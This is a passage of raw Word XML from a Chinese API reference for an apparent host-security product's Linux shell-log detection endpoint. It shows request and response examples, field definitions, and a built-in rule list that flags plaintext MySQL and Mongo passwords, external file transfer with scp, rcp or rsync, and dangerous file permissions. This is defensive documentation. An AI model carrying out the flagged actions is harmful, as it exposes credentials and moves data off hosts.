          <w:p w14:paraId="575F6F67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>MYSQL明文密码显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13DD3742" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B083421" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54C49035" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Mongo明文密码显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="49C35D93" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="289DACC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F9306B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>scp外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71D7768E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66E9AF09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DECD5EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rcp外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A68D27D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71EC0BC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="078D14EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rsync外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AB6E8AF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325FF20F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25D5EB77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>赋给目录或文件危险权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76093ABE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F7B90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/shelllog/linux?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D43CEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631FC02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "b470f51011e3b7a9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.100.26",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "192.168.100.26",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.100.26",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "bizGroup": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "localhost.localdomain",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "logTime": 1521686548,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "cmd": "cd /titan/agent",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hitRuleName": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "loginUser": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "loginIp": "192.168.199.109",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "auditStatus": 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D9D22"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885"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4331"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="79CC01F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7A21B56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30FF80FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55046671" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24DAD28C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08D80BD6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22759C3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F7625F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71858F4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BD79767" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7CB8CA9A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="634AB3CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43E0E657" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25F15ECA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37CE344A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74CDC82E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58418056" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63E54FF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F397FB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE53FD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37E55E97" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="158580B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA733C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5279866C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B26BB1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B26B55F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756AA7E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B791EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7865D848" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76274248" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E44B40A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7708E908" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BE0CAD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D2B2E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53256FF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="006AC5AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CBBB9A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18CE033A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325E8D74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70657C9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08ACE2AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B2DE5CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AD5912F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E2FA7C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05437A06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35088CA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B806D38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38EAF8E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295B7DA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35EF3672" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DFE6D63" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2408C952" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>logTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="002022CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BE3443F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08BE0CD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72E836CB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24B76966" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B534067" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33DA7ACC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA5B39B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作内容（带tag）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2AB3BFDE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="518B02C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cmdNoHightLight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF58D70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="533FEE08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="569B9BC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作内容（不带tag）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="318BB07D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CD45F52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hitRuleName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A59A50F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1DE2E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11958E95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命中规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="025E8DEE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56FE7464" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AC3F704" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AE85AB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
